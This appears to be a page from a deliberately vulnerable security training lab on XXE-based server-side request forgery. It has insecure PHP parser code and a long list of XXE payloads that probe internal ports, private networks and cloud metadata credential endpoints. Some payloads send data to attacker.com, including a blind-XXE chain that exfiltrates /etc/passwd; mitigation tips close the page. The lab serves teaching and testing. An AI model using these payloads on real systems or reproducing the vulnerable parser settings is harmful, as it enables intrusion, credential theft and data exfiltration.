Lab 3: XXE with SSRF - XML External Entity Injection Labs

Difficulty: Medium

Lab Overview

This lab demonstrates XXE vulnerabilities that lead to Server-Side Request Forgery (SSRF) attacks. Attackers can use external entities to make requests to internal services, cloud metadata endpoints, and other network resources.

Objective: Use XXE to perform SSRF attacks and demonstrate network reconnaissance capabilities.

Vulnerable Code

// Vulnerable: Direct XML processing without validation
function process_xxe_ssrf($xml_input) {
    // Vulnerable: Enable external entities (DEFAULT BEHAVIOR)
    libxml_disable_entity_loader(false);
    
    try {
        // Vulnerable: Direct XML parsing without validation
        $dom = new DOMDocument();
        $dom->loadXML($xml_input, LIBXML_NOENT | LIBXML_DTDLOAD);
        
        // Process XML data...
        return $data;
    } catch (Exception $e) {
        return "Error parsing XML: " . $e->getMessage();
    }
}

XXE SSRF Tester

⚠️ SSRF Warning

This lab demonstrates SSRF via XXE. The following can be exploited:

http://attacker.com - External requests
http://localhost:8080 - Internal services
http://169.254.169.254 - Cloud metadata
http://127.0.0.1:22 - Port scanning

SSRF Examples

Try these SSRF payloads:

http://attacker.com - External requests
http://localhost:8080 - Internal services
http://169.254.169.254 - Cloud metadata
http://127.0.0.1:22 - Port scanning

Parsed XML Data

Parsed Data (May contain SSRF responses):

Array
(
)

Vulnerability Details

Type: XXE with SSRF
Severity: High
Method: POST
Issue: SSRF via XXE

SSRF Attack Types

External Requests: http://attacker.com
Internal Services: localhost, 127.0.0.1
Cloud Metadata: 169.254.169.254
Port Scanning: Various ports

XXE SSRF Payloads

Use these payloads to test Server-Side Request Forgery via XML External Entity Injection:

1. Basic SSRF Structure:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<root><data>&xxe;</data></root>

2. External HTTP Requests:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://attacker.com/steal.php?data=secret">
]>
<root><data>&xxe;</data></root>

3. Internal Service Requests:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://localhost:8080">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://127.0.0.1:3306">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://localhost:22">
]>
<root><data>&xxe;</data></root>

4. Cloud Metadata Endpoints:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/user-data">
]>
<root><data>&xxe;</data></root>

5. Port Scanning Payloads:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://127.0.0.1:22">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://127.0.0.1:80">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://127.0.0.1:443">
]>
<root><data>&xxe;</data></root>

6. Database Port Scanning:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://127.0.0.1:3306">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://127.0.0.1:5432">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://127.0.0.1:6379">
]>
<root><data>&xxe;</data></root>

7. Internal Network Scanning:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://192.168.1.1">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://192.168.1.100">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://10.0.0.1">
]>
<root><data>&xxe;</data></root>

8. FTP SSRF Payloads:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "ftp://attacker.com/file.txt">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "ftp://anonymous:password@attacker.com/file.txt">
]>
<root><data>&xxe;</data></root>

9. Gopher SSRF Payloads:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "gopher://attacker.com:8080/1file.txt">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "gopher://127.0.0.1:25/1HELO%20attacker.com">
]>
<root><data>&xxe;</data></root>

10. LDAP SSRF Payloads:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "ldap://attacker.com:389/ou=users,dc=example,dc=com">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "ldap://127.0.0.1:389/ou=users,dc=example,dc=com">
]>
<root><data>&xxe;</data></root>

11. SMB SSRF Payloads:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "smb://attacker.com/share/file.txt">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "smb://127.0.0.1/share/file.txt">
]>
<root><data>&xxe;</data></root>

12. HTTPS SSRF Payloads:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "https://attacker.com">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "https://127.0.0.1:8443">
]>
<root><data>&xxe;</data></root>

13. Custom Port SSRF Payloads:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin">
]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://127.0.0.1:3000/api">
]>
<root><data>&xxe;</data></root>

14. External DTD for SSRF:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root SYSTEM "http://attacker.com/evil.dtd">
<root><data>&xxe;</data></root>

// evil.dtd content:
<!ENTITY xxe SYSTEM "http://attacker.com/steal.php">

15. Blind XXE for SSRF:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
    %remote;
]>
<root><data>&xxe;</data></root>

// evil.dtd content:
<!ENTITY xxe SYSTEM "http://attacker.com/steal.php?data=%file;">

Real-World Attack Scenarios

Server-Side Request Forgery (SSRF) attacks
Internal network reconnaissance and port scanning
Cloud metadata endpoint access and credential theft
Internal service enumeration and exploitation
Bypass firewall restrictions and access controls
Compliance violations and security breaches

Mitigation Strategies

Disable external entity processing in XML parsers
Use whitelist-based validation for allowed XML schemas
Implement proper input validation and sanitization
Use secure XML parsing libraries
Regular security testing and vulnerability assessments
Monitor for unusual XML processing patterns
Implement network segmentation and firewall rules
Use Web Application Firewall (WAF) to detect XXE attempts
Implement proper access controls for internal services
Block access to cloud metadata endpoints